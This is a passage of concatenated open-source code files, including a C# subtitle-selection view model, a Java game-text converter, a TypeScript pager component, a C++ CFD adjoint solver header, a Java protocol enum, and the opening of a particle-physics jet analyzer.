return this.Task.OutputFormat == OutputFormat.WebM;
}
}
#endregion
#region Public Methods
/// <summary>
/// Add a new Track
/// </summary>
public void Add()
{
this.Add(null);
}
/// <summary>
/// Add all closed captions not already on the list.
/// </summary>
public void AddAllClosedCaptions()
{
foreach (Subtitle subtitle in this.SourceTitlesSubset(null).Where(s => s.SubtitleType == SubtitleType.CC))
{
this.Add(subtitle);
}
}
/// <summary>
/// Add all the remaining subtitle tracks.
/// </summary>
public void AddAllRemaining()
{
foreach (Subtitle subtitle in this.SourceTitlesSubset(null))
{
this.Add(subtitle);
}
}
/// <summary>
/// Add all remaining tracks for the users preferred and selected languages
/// </summary>
public void AddAllRemainingForSelectedLanguages()
{
List<Subtitle> availableTracks = this.GetSelectedLanguagesTracks();
foreach (Subtitle subtitle in this.SourceTitlesSubset(availableTracks))
{
this.Add(subtitle);
}
}
/// <summary>
/// The add first for selected languages.
/// </summary>
public void AddFirstForSelectedLanguages()
{
bool anyLanguageSelected = this.SubtitleBehaviours.SelectedLangauges.Contains(Constants.Any);
foreach (Subtitle sourceTrack in this.GetSelectedLanguagesTracks())
{
// Step 2: Check if the track list already contains this track
bool found = this.Task.SubtitleTracks.Any(track => Equals(track.SourceTrack, sourceTrack));
if (!found)
{
// Check if we are already using this language
bool foundLanguage = false;
Subtitle track = sourceTrack;
foreach (var item in this.Task.SubtitleTracks)
{
if (item.SourceTrack != null && item.SourceTrack.LanguageCode != null && track.LanguageCode.Contains(item.SourceTrack.LanguageCode))
{
foundLanguage = true;
}
}
if (foundLanguage)
{
continue;
}
// If it doesn't, add it.
this.Add(sourceTrack);
// If we are using "(Any)" then break here. We only add the first track in this instance.
if (anyLanguageSelected)
{
break;
}
}
}
}
/// <summary>
/// Import an SRT File.
/// </summary>
public void Import()
{
OpenFileDialog dialog = new OpenFileDialog
{
Filter = "Subtitle files (*.srt, *.ssa, *.ass)|*.srt;*.ssa;*.ass",
CheckFileExists = true,
Multiselect = true
};
if (this.Task != null && this.Task.Source != null)
{
string path = Path.GetDirectoryName(this.Task.Source);
if (Directory.Exists(path))
{
dialog.InitialDirectory = path;
}
}
dialog.ShowDialog();
this.AddInputSubtitles(dialog.FileNames);
}
public void Import(string[] subtitleFiles)
{
if (subtitleFiles != null && subtitleFiles.Any())
{
this.AddInputSubtitles(subtitleFiles);
}
}
/// <summary>
/// Remove a Track
/// </summary>
/// <param name="track">
/// The track.
/// </param>
public void Remove(SubtitleTrack track)
{
this.Task.SubtitleTracks.Remove(track);
}
/// <summary>
/// Clear all Tracks
/// </summary>
public void Clear()
{
this.Task.SubtitleTracks.Clear();
}
/// <summary>
/// Select the default subtitle track.
/// </summary>
/// <param name="subtitle">
/// The subtitle.
/// </param>
public void SelectDefaultTrack(SubtitleTrack subtitle)
{
foreach (SubtitleTrack track in this.Task.SubtitleTracks)
{
if (track == subtitle)
{
continue; // Skip the track the user selected.
}
track.Default = false;
}
this.NotifyOfPropertyChange(() => this.Task);
}
/// <summary>
/// Select the burned in track.
/// </summary>
/// <param name="subtitle">
/// The subtitle.
/// </param>
public void SetBurnedToFalseForAllExcept(SubtitleTrack subtitle)
{
foreach (SubtitleTrack track in this.Task.SubtitleTracks)
{
if (track == subtitle)
{
continue; // Skip the track the user selected.
}
track.Burned = false;
}
this.NotifyOfPropertyChange(() => this.Task);
}
/// <summary>
/// Automatic Subtitle Selection based on user preferences.
/// </summary>
public void AutomaticSubtitleSelection()
{
this.Task.SubtitleTracks.Clear();
// Add Foreign Audio Scan
if (this.SubtitleBehaviours.AddForeignAudioScanTrack)
{
this.Add(foreignAudioSearchTrack);
}
// Add Track Behaviours
switch (this.SubtitleBehaviours.SelectedBehaviour)
{
case SubtitleBehaviourModes.FirstMatch: // Adding all remaining tracks
this.AddFirstForSelectedLanguages();
break;
case SubtitleBehaviourModes.AllMatching: // Add Langauges tracks for the additional languages selected, in-order.
this.AddAllRemainingForSelectedLanguages();
break;
}
// Burn In Behaviour
if (this.Task.SubtitleTracks.Count >= 1)
{
bool burnInSet = false;
switch (this.SubtitleBehaviours.SelectedBurnInBehaviour)
{
case SubtitleBurnInBehaviourModes.None:
foreach (var track in this.Task.SubtitleTracks)
{
if (track.SourceTrack.SubtitleType == SubtitleType.ForeignAudioSearch)
{
track.Forced = true;
break;
}
}
break;
case SubtitleBurnInBehaviourModes.ForeignAudio:
foreach (var track in this.Task.SubtitleTracks)
{
// Set the Foreign Audio Track to burned-in
if (track.SourceTrack.SubtitleType == SubtitleType.ForeignAudioSearch)
{
track.Burned = true;
track.Forced = true;
this.SetBurnedToFalseForAllExcept(track);
break;
}
}
break;
case SubtitleBurnInBehaviourModes.FirstTrack:
foreach (var track in this.Task.SubtitleTracks)
{
// Foreign Audio Search is always first in the list.
if (track.SourceTrack.SubtitleType == SubtitleType.ForeignAudioSearch)
{
track.Forced = true;
continue;
}
if (!burnInSet)
{
burnInSet = true;
track.Burned = true;
this.SetBurnedToFalseForAllExcept(track);
}
}
break;
case SubtitleBurnInBehaviourModes.ForeignAudioPreferred:
foreach (var track in this.Task.SubtitleTracks)
{
// Set the first track.
if (!burnInSet)
{
burnInSet = true;
track.Burned = true;
this.SetBurnedToFalseForAllExcept(track);
}
// But if there is a foreign audio track, prefer this to the first.
if (track.SourceTrack.SubtitleType == SubtitleType.ForeignAudioSearch)
{
track.Burned = true;
track.Forced = true;
this.SetBurnedToFalseForAllExcept(track);
break;
}
}
break;
}
}
// Add all closed captions if enabled.
if (this.SubtitleBehaviours.AddClosedCaptions)
{
this.AddAllClosedCaptions();
}
}
/// <summary>
/// The show audio defaults.
/// </summary>
public void ShowSubtitleDefaultsPanel()
{
SubtitlesDefaultsView view = new SubtitlesDefaultsView();
view.DataContext = this.SubtitleDefaultsViewModel;
if (view.ShowDialog() == true)
{
this.OnTabStatusChanged(null);
}
}
/// <summary>
/// Reload the audio tracks based on the defaults.
/// </summary>
public void ReloadDefaults()
{
this.AutomaticSubtitleSelection();
}
/// <summary>
/// Trigger a Notify Property Changed on the Task to force various UI elements to update.
/// </summary>
public void RefreshTask()
{
this.NotifyOfPropertyChange(() => this.Task);
this.NotifyOfPropertyChange(() => this.IsBurnableOnly);
if (this.IsBurnableOnly)
{
foreach (var subtitleTrack in this.Task.SubtitleTracks)
{
if (subtitleTrack.Default)
{
subtitleTrack.Default = false;
}
}
}
}
#endregion
#region Implemented Interfaces
/// <summary>
/// Setup this tab for the specified preset.
/// </summary>
/// <param name="preset">
/// The preset.
/// </param>
/// <param name="task">
/// The task.
/// </param>
public void SetPreset(Preset preset, EncodeTask task)
{
// Note, We don't support Subtitles in presets yet.
this.Task = task;
this.NotifyOfPropertyChange(() => this.Task);
this.SubtitleDefaultsViewModel.SetupLanguages(preset);
this.AutomaticSubtitleSelection();
}
/// <summary>
/// Update all the UI controls based on the encode task passed in.
/// </summary>
/// <param name="task">
/// The task.
/// </param>
public void UpdateTask(EncodeTask task)
{
this.Task = task;
this.NotifyOfPropertyChange(() => this.Task.SubtitleTracks);
this.NotifyOfPropertyChange(() => this.Task);
}
public bool MatchesPreset(Preset preset)
{
// Check the default behaviours.
if (preset.SubtitleTrackBehaviours.AddClosedCaptions != this.SubtitleBehaviours.AddClosedCaptions)
{
return false;
}
if (preset.SubtitleTrackBehaviours.AddForeignAudioScanTrack != this.SubtitleBehaviours.AddForeignAudioScanTrack)
{
return false;
}
if (preset.SubtitleTrackBehaviours.SelectedBehaviour != this.SubtitleBehaviours.SelectedBehaviour)
{
return false;
}
if (preset.SubtitleTrackBehaviours.SelectedBurnInBehaviour != this.SubtitleBehaviours.SelectedBurnInBehaviour)
{
return false;
}
foreach (var item in this.SubtitleBehaviours.SelectedLangauges)
{
if (!preset.SubtitleTrackBehaviours.SelectedLangauges.Contains(item))
{
return false;
}
}
return true;
}
/// <summary>
/// Setup this window for a new source
/// </summary>
/// <param name="source">
/// The source.
/// </param>
/// <param name="title">
/// The title.
/// </param>
/// <param name="preset">
/// The preset.
/// </param>
/// <param name="task">
/// The task.
/// </param>
public void SetSource(Source source, Title title, Preset preset, EncodeTask task)
{
this.SourceTracks.Clear();
this.SourceTracks.Add(foreignAudioSearchTrack);
foreach (Subtitle subtitle in title.Subtitles)
{
this.SourceTracks.Add(subtitle);
}
this.Task = task;
this.NotifyOfPropertyChange(() => this.Task);
this.AutomaticSubtitleSelection();
}
/// <summary>
/// Checks the configuration of the subtitles and warns the user about any potential issues.
/// </summary>
public bool ValidateSubtitles()
{
var nonBurnedSubtitles = this.Task.SubtitleTracks.Where(subtitleTrack => !subtitleTrack.Burned).ToList();
if (nonBurnedSubtitles.Count > 0 && this.IsBurnableOnly)
{
MessageBoxResult result = this.errorService.ShowMessageBox(
Resources.Subtitles_WebmSubtitleIncompatibilityError,
Resources.Subtitles_WebmSubtitleIncompatibilityHeader,
MessageBoxButton.OKCancel,
MessageBoxImage.Warning);
if (result == MessageBoxResult.OK)
{
foreach (var subtitleTrack in nonBurnedSubtitles)
{
if (!subtitleTrack.Burned)
{
this.Remove(subtitleTrack);
}
}
}
else if (result == MessageBoxResult.Cancel)
{
return false;
}
else
{
return false;
}
}
return true;
}
#endregion
#region Methods
protected virtual void OnTabStatusChanged(TabStatusEventArgs e)
{
this.TabStatusChanged?.Invoke(this, e);
}
/// <summary>
/// Add a subtitle track.
/// The Source track is set based on the following order. If null, it will skip to the next option.
/// 1. Passed in Subitle param
/// 2. First preferred Subtitle from source
/// 3. First subtitle from source.
/// Will not add a subtitle if the source has none.
/// </summary>
/// <param name="subtitle">
/// The subtitle. Use null to add preferred, or first from source (based on user preference)
/// </param>
private void Add(Subtitle subtitle)
{
Subtitle source = subtitle
?? ((this.SourceTracks != null)
? (this.SourceTracks.FirstOrDefault(l => l.Language == this.GetPreferredSubtitleTrackLanguage())
?? this.SourceTracks.FirstOrDefault(
s => s.SubtitleType != SubtitleType.ForeignAudioSearch))
: null);
if (source == null)
{
source = foreignAudioSearchTrack;
}
SubtitleTrack track = new SubtitleTrack
{
SubtitleType = source.SubtitleType,
SourceTrack = source,
};
// Burn-in Behaviours
if (this.SubtitleBehaviours.SelectedBurnInBehaviour == SubtitleBurnInBehaviourModes.ForeignAudio
|| this.SubtitleBehaviours.SelectedBurnInBehaviour == SubtitleBurnInBehaviourModes.ForeignAudioPreferred)
{
if (subtitle != null && subtitle.SubtitleType == SubtitleType.ForeignAudioSearch)
{
track.Burned = true;
this.SetBurnedToFalseForAllExcept(track);
}
}
// For MP4, PGS Subtitles must be burned in.
if (!track.Burned && (source.SubtitleType == SubtitleType.PGS) && this.Task != null && this.Task.OutputFormat == OutputFormat.Mp4)
{
if (this.Task.SubtitleTracks.Any(a => a.Burned))
{
return; // We can't add any more burned in tracks.
}
if (track.CanBeBurned)
{
track.Burned = true;
this.SetBurnedToFalseForAllExcept(track);
}
}
var encodeTask = this.Task;
if (encodeTask != null)
{
encodeTask.SubtitleTracks.Add(track);
}
}
/// <summary>
/// Gets a list of source tracks for the users selected languages.
/// </summary>
/// <returns>
/// A list of source subtitle tracks.
/// </returns>
private List<Subtitle> GetSelectedLanguagesTracks()
{
// Translate to Iso Codes
List<string> iso6392Codes = new List<string>();
if (this.SubtitleBehaviours.SelectedLangauges.Contains(Constants.Any))
{
iso6392Codes = LanguageUtilities.GetIsoCodes();
iso6392Codes = LanguageUtilities.OrderIsoCodes(iso6392Codes, this.SubtitleBehaviours.SelectedLangauges);
}
else
{
iso6392Codes = LanguageUtilities.GetLanguageCodes(this.SubtitleBehaviours.SelectedLangauges.ToArray());
}
List<Subtitle> orderedSubtitles = new List<Subtitle>();
foreach (string code in iso6392Codes)
{
orderedSubtitles.AddRange(this.SourceTracks.Where(subtitle => subtitle.LanguageCodeClean == code ));
}
return orderedSubtitles;
}
/// <summary>
/// The get preferred subtitle track, or the first if none available.
/// </summary>
/// <returns>
/// The users preferred language, or the first if none available.
/// </returns>
private string GetPreferredSubtitleTrackLanguage()
{
string langName = this.SubtitleBehaviours.SelectedLangauges.FirstOrDefault(w => w != Constants.Any);
string langCode = LanguageUtilities.GetLanguageCode(langName);
return langCode;
}
/// <summary>
/// Gets a list of Source subtitle tracks that are not currently used.
/// </summary>
/// <param name="subtitles">
/// The subtitles. (Optional). If null, works on the full source subtitle collection
/// </param>
/// <returns>
/// An IEnumerable collection of subtitles
/// </returns>
private IEnumerable<Subtitle> SourceTitlesSubset(IEnumerable<Subtitle> subtitles)
{
return subtitles != null
? subtitles.Where(subtitle => !this.Task.SubtitleTracks.Any(track => Equals(track.SourceTrack, subtitle))).ToList()
: this.SourceTracks.Where(subtitle => !this.Task.SubtitleTracks.Any(track => Equals(track.SourceTrack, subtitle))).ToList();
}
private void AddInputSubtitles(string[] filenames)
{
foreach (var srtFile in filenames)
{
if (!File.Exists(srtFile))
{
continue;
}
SubtitleTrack track = new SubtitleTrack
{
SrtFileName = Path.GetFileNameWithoutExtension(srtFile),
SrtOffset = 0,
SrtCharCode = "UTF-8",
SrtLang = "English",
SubtitleType = SubtitleType.SRT,
SrtPath = srtFile
};
this.Task.SubtitleTracks.Add(track);
}
}
#endregion
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2014-2020 OpenKeeper
*
* OpenKeeper is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* OpenKeeper is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with OpenKeeper. If not, see <http://www.gnu.org/licenses/>.
*/
package toniarts.openkeeper.tools.convert.conversion.task;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.io.PrintWriter;
import java.nio.file.FileVisitOption;
import java.nio.file.FileVisitResult;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.SimpleFileVisitor;
import java.nio.file.attribute.BasicFileAttributes;
import java.util.ArrayList;
import java.util.EnumSet;
import java.util.List;
import java.util.Map;
import java.util.logging.Level;
import java.util.logging.Logger;
import toniarts.openkeeper.tools.convert.AssetsConverter;
import toniarts.openkeeper.tools.convert.str.MbToUniFile;
import toniarts.openkeeper.tools.convert.str.StrFile;
import toniarts.openkeeper.utils.AssetUtils;
import toniarts.openkeeper.utils.PathUtils;
/**
* Dungeon Keeper II texts conversion. Converts all interface texts to plain
* Java resource bundles.
*
* @author Toni Helenius <[email protected]>
*/
public class ConvertTexts extends ConversionTask {
private static final Logger LOGGER = Logger.getLogger(ConvertTexts.class.getName());
public ConvertTexts(String dungeonKeeperFolder, String destination, boolean overwriteData) {
super(dungeonKeeperFolder, destination, overwriteData);
}
@Override
public void internalExecuteTask() {
convertTexts(dungeonKeeperFolder, destination);
}
/**
* Extract and copy DK II interface texts
*
* @param dungeonKeeperFolder DK II main folder
* @param destination Destination folder
*/
private void convertTexts(String dungeonKeeperFolder, String destination) {
LOGGER.log(Level.INFO, "Extracting texts to: {0}", destination);
updateStatus(null, null);
AssetUtils.deleteFolder(new File(destination));
String dataDirectory = dungeonKeeperFolder + PathUtils.DKII_TEXT_DEFAULT_FOLDER;
// Find all the STR files
final List<File> srtFiles = new ArrayList<>();
File dataDir = new File(dataDirectory);
try {
Files.walkFileTree(dataDir.toPath(), EnumSet.noneOf(FileVisitOption.class), 1, new SimpleFileVisitor<Path>() {
@Override
public FileVisitResult visitFile(Path file, BasicFileAttributes attrs) throws IOException {
//Get all the STR files
if (attrs.isRegularFile() && file.getFileName().toString().toLowerCase().endsWith(".str")) {
srtFiles.add(file.toFile());
}
//Always continue
return FileVisitResult.CONTINUE;
}
});
} catch (IOException ex) {
String msg = "Failed to scan texts folder " + dataDirectory + "!";
LOGGER.log(Level.SEVERE, msg, ex);
throw new RuntimeException(msg, ex);
}
// Convert the STR files to JAVA native resource bundles
new File(destination).mkdirs(); // Ensure that the folder exists
int i = 0;
int total = srtFiles.size();
MbToUniFile codePage = null;
for (File file : srtFiles) {
updateStatus(i, total);
i++;
// The code page cache makes processing faster
StrFile strFile;
if (codePage == null) {
strFile = new StrFile(file);
codePage = strFile.getCodePage();
} else {
strFile = new StrFile(codePage, file);
}
// Write the properties
String fileName = file.getName();
fileName = fileName.substring(0, fileName.length() - 3);
File dictFile = new File(destination.concat(fileName).concat("properties"));
try (PrintWriter pw = new PrintWriter(new OutputStreamWriter(new FileOutputStream(dictFile, false), "UTF-8"))) {
for (Map.Entry<Integer, String> entry : strFile.getEntriesAsSet()) {
pw.println(entry.getKey() + "=" + entry.getValue());
}
} catch (IOException ex) {
String msg = "Failed to save the dictionary file to " + dictFile + "!";
LOGGER.log(Level.SEVERE, msg, ex);
throw new RuntimeException(msg, ex);
}
}
}
@Override
public AssetsConverter.ConvertProcess getConvertProcess() {
return AssetsConverter.ConvertProcess.INTERFACE_TEXTS;
}
}
| {
"pile_set_name": "Github"
} |
import {
Component, ComponentBindings, JSXComponent, OneWay, Fragment, Consumer,
} from 'devextreme-generator/component_declaration/common';
import { LightButton } from '../common/light_button';
import { PagesLarge } from './large';
import { PagesSmall } from './small';
import PagerProps from '../common/pager_props';
import { ConfigContextValue, ConfigContext } from '../../common/config_context';
const PAGER_NAVIGATE_BUTTON = 'dx-navigate-button';
const PAGER_PREV_BUTTON_CLASS = 'dx-prev-button';
const PAGER_NEXT_BUTTON_CLASS = 'dx-next-button';
export const PAGER_BUTTON_DISABLE_CLASS = 'dx-button-disable';
const nextButtonClassName = `${PAGER_NAVIGATE_BUTTON} ${PAGER_NEXT_BUTTON_CLASS}`;
const prevButtonClassName = `${PAGER_NAVIGATE_BUTTON} ${PAGER_PREV_BUTTON_CLASS}`;
const nextButtonDisabledClassName = `${PAGER_BUTTON_DISABLE_CLASS} ${PAGER_NAVIGATE_BUTTON} ${PAGER_NEXT_BUTTON_CLASS}`;
const prevButtonDisabledClassName = `${PAGER_BUTTON_DISABLE_CLASS} ${PAGER_NAVIGATE_BUTTON} ${PAGER_PREV_BUTTON_CLASS}`;
// eslint-disable-next-line @typescript-eslint/explicit-function-return-type
export const viewFunction = ({
renderPrevButton,
renderNextButton,
prevClassName,
navigateToPrevPage,
nextClassName,
navigateToNextPage,
pageIndexChange,
props: {
isLargeDisplayMode, maxPagesCount,
pageCount, pageIndex, pagesCountText,
},
}: PageIndexSelector) => (
<Fragment>
{renderPrevButton && (
<LightButton
className={prevClassName}
label="Previous page"
onClick={navigateToPrevPage}
/>
)}
{isLargeDisplayMode && (
<PagesLarge
maxPagesCount={maxPagesCount}
pageCount={pageCount}
pageIndex={pageIndex}
pageIndexChange={pageIndexChange}
/>
)}
{!isLargeDisplayMode && (
<PagesSmall
pageCount={pageCount}
pageIndex={pageIndex}
pageIndexChange={pageIndexChange}
pagesCountText={pagesCountText}
/>
)}
{renderNextButton && (
<LightButton
className={nextClassName}
label="Next page"
onClick={navigateToNextPage}
/>
)}
</Fragment>
);
type Direction = 'next' | 'prev';
function getIncrement(direction: Direction): number {
return direction === 'next' ? +1 : -1;
}
/* istanbul ignore next: class has only props default */
@ComponentBindings()
export class PageIndexSelectorProps {
@OneWay() isLargeDisplayMode = true;
}
type PageIndexSelectorPropsType = Pick<PagerProps,
'hasKnownLastPage' | 'maxPagesCount' | 'pageCount' | 'pageIndex' | 'pageIndexChange' | 'pagesCountText' |
'showNavigationButtons' | 'totalCount'> & PageIndexSelectorProps;
@Component({ defaultOptionRules: null, view: viewFunction })
export class PageIndexSelector extends JSXComponent<PageIndexSelectorPropsType>() {
@Consumer(ConfigContext)
config?: ConfigContextValue;
private getNextDirection(): Direction {
return !this.config?.rtlEnabled ? 'next' : 'prev';
}
private getPrevDirection(): Direction {
return !this.config?.rtlEnabled ? 'prev' : 'next';
}
private canNavigateToPage(pageIndex: number): boolean {
if (!this.props.hasKnownLastPage) {
return pageIndex >= 0;
}
return (pageIndex >= 0 && pageIndex <= (this.props.pageCount as number) - 1);
}
private getNextPageIndex(direction: Direction): number {
return (this.props.pageIndex as number) + getIncrement(direction);
}
private canNavigateTo(direction: Direction): boolean {
return this.canNavigateToPage(this.getNextPageIndex(direction));
}
private navigateToPage(direction: Direction): void {
this.pageIndexChange(this.getNextPageIndex(direction));
}
get renderPrevButton(): boolean {
const {
isLargeDisplayMode,
showNavigationButtons,
} = this.props;
return !isLargeDisplayMode || showNavigationButtons;
}
get renderNextButton(): boolean {
return this.renderPrevButton || !this.props.hasKnownLastPage;
}
get nextClassName(): string {
const direction = this.getNextDirection();
const canNavigate = this.canNavigateTo(direction);
return canNavigate ? nextButtonClassName : nextButtonDisabledClassName;
}
get prevClassName(): string {
const direction = this.getPrevDirection();
const canNavigate = this.canNavigateTo(direction);
return canNavigate ? prevButtonClassName : prevButtonDisabledClassName;
}
pageIndexChange(pageIndex: number): void {
if (this.canNavigateToPage(pageIndex)) {
this.props.pageIndex = pageIndex;
}
}
navigateToNextPage(): void {
this.navigateToPage(this.getNextDirection());
}
navigateToPrevPage(): void {
this.navigateToPage(this.getPrevDirection());
}
}
| {
"pile_set_name": "Github"
} |
/*!
* \file CMeshSolver.hpp
* \brief Declaration and inlines of the class to compute the
* the discrete adjoint of the linear-elastic mesh solver.
* \author Ruben Sanchez
* \version 7.0.6 "Blackbird"
*
* SU2 Project Website: https://su2code.github.io
*
* The SU2 Project is maintained by the SU2 Foundation
* (http://su2foundation.org)
*
* Copyright 2012-2020, SU2 Contributors (cf. AUTHORS.md)
*
* SU2 is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* SU2 is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with SU2. If not, see <http://www.gnu.org/licenses/>.
*/
#pragma once
#include "CSolver.hpp"
#include "../variables/CDiscAdjMeshBoundVariable.hpp"
/*!
* \class CDiscAdjMeshSolver
* \brief Main class for defining the discrete adjoint solver for mesh deformation problems.
* \ingroup Discrete_Adjoint
* \author R. Sanchez
*/
class CDiscAdjMeshSolver final : public CSolver {
private:
unsigned short KindDirect_Solver;
CSolver *direct_solver;
CDiscAdjMeshBoundVariable* nodes = nullptr; /*!< \brief Variables of the discrete adjoint mesh solver. */
/*!
* \brief Return nodes to allow CSolver::base_nodes to be set.
*/
inline CVariable* GetBaseClassPointerToNodes() override { return nodes; }
public:
/*!
* \brief Constructor of the class.
*/
CDiscAdjMeshSolver(void);
/*!
* \overload
* \param[in] geometry - Geometrical definition of the problem.
* \param[in] config - Definition of the particular problem.
* \param[in] iMesh - Index of the mesh in multigrid computations.
*/
CDiscAdjMeshSolver(CGeometry *geometry, CConfig *config);
/*!
* \overload
* \param[in] geometry - Geometrical definition of the problem.
* \param[in] config - Definition of the particular problem.
* \param[in] solver - Initialize the discrete adjoint solver with the corresponding direct solver.
* \param[in] Kind_Solver - The kind of direct solver.
*/
CDiscAdjMeshSolver(CGeometry *geometry, CConfig *config, CSolver* solver);
/*!
* \brief Destructor of the class.
*/
~CDiscAdjMeshSolver(void) override;
/*!
* \brief Performs the preprocessing of the AD-based mesh adjoint solver.
* Registers all necessary variables on the tape. Called while tape is active.
* \param[in] geometry_container - The geometry container holding all grid levels.
* \param[in] config_container - The particular config.
*/
void RegisterSolution(CGeometry *geometry, CConfig *config) override;
/*!
* \brief Sets the adjoint values of the input variables of the flow (+turb.) iteration
* after tape has been evaluated.
* \param[in] geometry - The geometrical definition of the problem.
* \param[in] config - The particular config.
*/
void ExtractAdjoint_Solution(CGeometry *geometry, CConfig *config) override;
/*!
* \brief Extract and set the geometrical sensitivity.
* \param[in] geometry - Geometrical definition of the problem.
* \param[in] solver - The solver container holding all terms of the solution.
* \param[in] config - Definition of the particular problem.
*/
void SetSensitivity(CGeometry *geometry, CSolver **solver, CConfig *config) override;
/*!
* \brief Prepare the solver for a new recording.
* \param[in] kind_recording - Kind of AD recording.
*/
void SetRecording(CGeometry *geometry, CConfig *config) override;
/*!
* \brief A virtual member.
* \param[in] geometry - Geometrical definition of the problem.
* \param[in] config - Definition of the particular problem.
* \param[in] reset - If true reset variables to their initial values.
*/
void RegisterVariables(CGeometry *geometry,
CConfig *config,
bool reset = false) override;
/*!
* \brief A virtual member.
* \param[in] geometry - Geometrical definition of the problem.
* \param[in] config - Definition of the particular problem.
*/
void ExtractAdjoint_Variables(CGeometry *geometry, CConfig *config) override;
/*!
* \brief Update the dual-time derivatives.
* \param[in] geometry - Geometrical definition of the problem.
* \param[in] solver_container - Container vector with all the solutions.
* \param[in] config - Definition of the particular problem.
* \param[in] iMesh - Index of the mesh in multigrid computations.
* \param[in] iRKStep - Current step of the Runge-Kutta iteration.
* \param[in] RunTime_EqSystem - System of equations which is going to be solved.
* \param[in] Output - boolean to determine whether to print output.
*/
void Preprocessing(CGeometry *geometry,
CSolver **solver_container,
CConfig *config,
unsigned short iMesh,
unsigned short iRKStep,
unsigned short RunTime_EqSystem,
bool Output) override;
/*!
* \brief Load a solution from a restart file.
* \param[in] geometry - Geometrical definition of the problem.
* \param[in] solver - Container vector with all of the solvers.
* \param[in] config - Definition of the particular problem.
* \param[in] val_iter - Current external iteration number.
* \param[in] val_update_geo - Flag for updating coords and grid velocity.
*/
void LoadRestart(CGeometry **geometry,
CSolver ***solver,
CConfig *config,
int val_iter,
bool val_update_geo) override;
};
| {
"pile_set_name": "Github"
} |
/**
* DSS - Digital Signature Services
* Copyright (C) 2015 European Commission, provided under the CEF programme
*
* This file is part of the "DSS - Digital Signature Services" project.
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
package eu.europa.esig.dss.spi.client.http;
/**
* This enum lists all network protocols that can be used during the signature creation or validation: OCSP, CRL, AIA, TSL...
*
*/
public enum Protocol {
FILE("file"), HTTP("http"), HTTPS("https"), LDAP("ldap"), FTP("ftp");
private final String name;
Protocol(final String name) {
this.name = name;
}
/**
* @return the name of the protocol
*/
public String getName() {
return name;
}
/**
* Indicates if the given string represents HTTPS protocol.
*
* @param name {@code String} to be checked
* @return true or false
*/
public static boolean isHttps(final String name) {
return HTTPS.name.equalsIgnoreCase(name);
}
/**
* Indicates if the given string represents HTTP protocol.
*
* @param name {@code String} to be checked
* @return true or false
*/
public static boolean isHttp(final String name) {
return HTTP.name.equalsIgnoreCase(name);
}
/**
* Indicates if the given URL uses FILE protocol
*
* @param urlString to be checked
* @return true or false
*/
public static boolean isFileUrl(final String urlString) {
return urlString !=null && urlString.startsWith(FILE.name);
}
/**
* Indicates if the given URL uses HTTP protocol
*
* @param urlString to be checked
* @return true or false
*/
public static boolean isHttpUrl(final String urlString) {
return urlString !=null && urlString.startsWith(HTTP.name);
}
/**
* Indicates if the given URL uses FTP protocol
*
* @param urlString to be checked
* @return true or false
*/
public static boolean isFtpUrl(final String urlString) {
return urlString !=null && urlString.startsWith(FTP.name);
}
/**
* Indicates if the given URL uses LDAP protocol
*
* @param urlString to be checked
* @return true or false
*/
public static boolean isLdapUrl(final String urlString) {
return urlString !=null && urlString.startsWith(LDAP.name);
}
/**
* Indicates if the given URL uses the current protocol
*
* @param urlString to be checked
* @return true or false
*/
public boolean isTheSame(final String urlString) {
return urlString != null && urlString.startsWith(name);
}
/**
* This method try to retrieve the protocol indicated by the given URL string.
*
* @param urlString to be analysed
* @return found {@code Protocol} or {@code null}
*/
public static Protocol getFrom(final String urlString) {
if (HTTP.isTheSame(urlString)) {
return HTTP;
} else if (HTTPS.isTheSame(urlString)) {
return HTTPS;
} else if (LDAP.isTheSame(urlString)) {
return LDAP;
} else if (FTP.isTheSame(urlString)) {
return FTP;
} else if (FILE.isTheSame(urlString)) {
return FILE;
}
return null;
}
}
| {
"pile_set_name": "Github"
} |
// Name: JetAnaPythia
// Description: Example of analysis of Pythia produced partons & jets
// Based on Kostas Kousouris' templated JetPlotsExample.
// Plots are tailored to needs of dijet mass and ratio analysis.
// Author: R. Harris
// Date: 28 - Oct - 2008
#include "RecoJets/JetAnalyzers/interface/JetAnaPythia.h"
#include "DataFormats/JetReco/interface/CaloJetCollection.h"
#include "DataFormats/JetReco/interface/PFJetCollection.h"
#include "DataFormats/JetReco/interface/GenJetCollection.h"
#include "DataFormats/JetReco/interface/CaloJet.h"
#include "DataFormats/JetReco/interface/PFJet.h"
#include "DataFormats/JetReco/interface/GenJet.h"
#include "DataFormats/HepMCCandidate/interface/GenParticle.h"
#include "SimDataFormats/GeneratorProducts/interface/GenRunInfoProduct.h"
#include "SimDataFormats/GeneratorProducts/interface/HepMCProduct.h"
#include "FWCore/Framework/interface/Event.h"
#include "FWCore/Framework/interface/Run.h"
#include "FWCore/ParameterSet/interface/ParameterSet.h"
#include <TFile.h>
#include <cmath>
using namespace edm;
using namespace reco;
using namespace std;
////////////////////////////////////////////////////////////////////////////////////////
template <class Jet>
JetAnaPythia<Jet>::JetAnaPythia(edm::ParameterSet const& cfg) {
JetAlgorithm = cfg.getParameter<std::string>("JetAlgorithm");
HistoFileName = cfg.getParameter<std::string>("HistoFileName");
NJets = cfg.getParameter<int>("NJets");
